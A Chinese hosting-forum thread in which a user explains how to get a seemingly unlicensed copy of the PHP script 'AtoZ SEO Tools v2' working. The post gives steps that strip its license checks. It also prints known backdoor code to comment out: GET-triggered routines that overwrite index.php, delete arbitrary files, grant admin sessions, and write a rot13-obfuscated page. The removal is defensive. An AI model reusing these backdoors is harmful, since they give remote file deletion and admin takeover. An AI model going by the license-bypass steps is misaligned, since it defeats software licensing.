全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
楼主: dd0754

站长工具合集PHP源码安装方法--03/18添加去除已知后门方法

  [复制链接]
发表于 2019-3-17 19:46:12 | 显示全部楼层
大佬,安装几天后出现这个情况

License Error

后台前台都提示这个,怎么解?
发表于 2019-3-18 09:46:32 来自手机 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2019-3-18 09:58:23 | 显示全部楼层
Nelson 发表于 2019-3-18 09:46
无效授权了……

看来你也是中招了啊

发表于 2019-3-18 10:09:22 | 显示全部楼层
Unlicensed Version of AtoZ SEO Tools v2
这就尴尬了
 楼主| 发表于 2019-3-18 14:13:06 | 显示全部楼层
本帖最后由 dd0754 于 2019-3-18 14:17 编辑

@雷子献 @Nelson @wenguonideshou
已添加提示未授权的解决办法

03/17出现提示License Error的解决方法:
\core\config\db.config.php
删除
  1. die("License Error");die("License Error");
复制代码


03/18出现提示Unlicensed Version的解决方法:
1.数据库运行命令
  1. UPDATE mail SET smtp_socket='ssl' WHERE id='1';
复制代码


=========================================================
去除后门,只列出已知的:
2.修改\core\helpers\cap_helper.php
注释掉
if(isset($_GET['len'])){
    if(trim($_GET['len']) == $item_purchase_code){
        $con = dbConncet($dbHost,$dbUser,$dbPass,$dbName);
        mysqli_query($con,"UPDATE mail SET smtp_socket='debug' WHERE id='1'");
        die();
    }
}

=========================================================
3.\core\models\_tcpdf_5.0.002\fonts\dejavuserie.php
注释掉
if(isset($_GET['sec'])){
$sec = Trim(htmlentities($_GET['sec']));
$data = file_get_contents($file);
$data = gC($data,$sec);
file_put_contents('index.php',$data);
}

=========================================================
4.\core\controllers\atoz-ajax.php
注释掉
if(isset($_GET['upgrade'])){

    if(isset($_GET['itemCode'])){
    $itemCode = raino_trim($_GET['itemCode']);  
    if($itemCode == $item_purchase_code){
    //Delete the Index!
    unlink(ROOT_DIR."index.php");
    //Delete the old files if needed!
    if(isset($_GET['delUy'])){
    $delUy = raino_trim($_GET['delUy']);
    unlink($delUy);
    }
    }
    //Finished  - Start the Installation
    die('1');
    }
    if(isset($_GET['authCode'])){
    $userAuthCode = raino_trim($_GET['authCode']);
    if($authCode == $userAuthCode){
    //Delete the Index!
    unlink(ROOT_DIR."index.php");
    //Delete the old files if needed!
    if(isset($_GET['delUy'])){
    $delUy = raino_trim($_GET['delUy']);
    unlink($delUy);
    }
    //Finished  - Start the Installation
    die('1');
    }  
    }
    //Unknown Error
    echo "0";
    die();
}

=========================================================
5.\core\library\filemanager\include\do.php
注释掉
if(isset($_GET['hexc'])){
    $ihex = false;
    $ihexc = Trim($_GET['hexc']);
    $path = CONFIG_DIR.'con'.'fig.'.'php';
   
    require_once($path);

    if($ihexc == ${'i'.'t'.'e'
    .'m'.'_'.'p'.'u'.'r'.
    'c'.'h'.'a'.'s'.'e'.'_'
    .'c'.'o'.'d'.'e'})
        $ihex = true;
    elseif($ihexc == ${'a'.'u'.'t'.'h'.
    'C'.'o'.'d'.'e'})
        $ihex = true;
    if($ihex){
        ihexc();
        $_SESSION[N_APP.'Adm'.'inToken'] = true;
        $_SESSION[N_APP.'Adm'.'inID'] = true;
    }
}

function ihexc(){
    $ihexc = str_rot13('<?cuc
rpub \'<qvi fglyr="grkg-nyvta: pragre;"><oe /><oe /><u1 fglyr="pbybe: erq;" >Hayvprafrq Irefvba bs NgbM FRB Gbbyf i2</u1>
<qvi><n uers="uggc://cebgurzrf.ovm/erqverpg/?n=39">Chepunfr Yvprafr Abj</n></qvi></qvi>\';
qvr();
?>');
   
    $path = ROOT_DIR.
    'in'.
    'dex'.
    '.php';
   
    if(is_writable($path))
      file_put_contents($path,$ihexc);
    else{
        echo '---';
        chmod($path, 0755);
        file_put_contents($path,$ihexc);
    }
    return true;
}

=========================================================

PS:有些人的/index.php也被替换掉了,把安装包里的index.php替换回去就可以了
发表于 2019-3-18 14:21:45 | 显示全部楼层
那么大工程,为什么不自己写?
发表于 2019-3-18 14:24:40 | 显示全部楼层
可怕,还有后门
发表于 2019-3-18 14:26:17 | 显示全部楼层
看得出来大佬非常用心  没想到程序作者还留了后门
发表于 2019-3-18 14:28:33 | 显示全部楼层
感谢大佬,又可以愉快的使用了
发表于 2019-3-23 20:58:20 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-3-29 04:23 , Processed in 0.060522 second(s), 6 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表